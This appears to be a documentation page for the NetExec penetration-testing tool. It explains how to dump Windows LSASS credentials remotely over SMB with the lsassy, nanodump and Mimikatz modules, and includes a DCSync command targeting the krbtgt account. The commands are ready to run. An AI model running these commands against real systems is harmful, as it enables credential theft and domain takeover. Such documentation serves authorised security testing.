Dump LSASS
You need at least local admin privileges on the remote target; use the --local-auth option if your user is a local account.
Using Lsassy
Using the Lsassy module from @pixis, you can dump the credentials remotely:
nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
Using nanodump
Using the nanodump module, you can dump the credentials remotely:
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
Using Mimikatz (deprecated)
You need at least local admin privileges on the remote target; use the --local-auth option if your user is a local account.
The Mimikatz module executes the PowerShell script Invoke-Mimikatz.ps1 on the remote target:
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"'

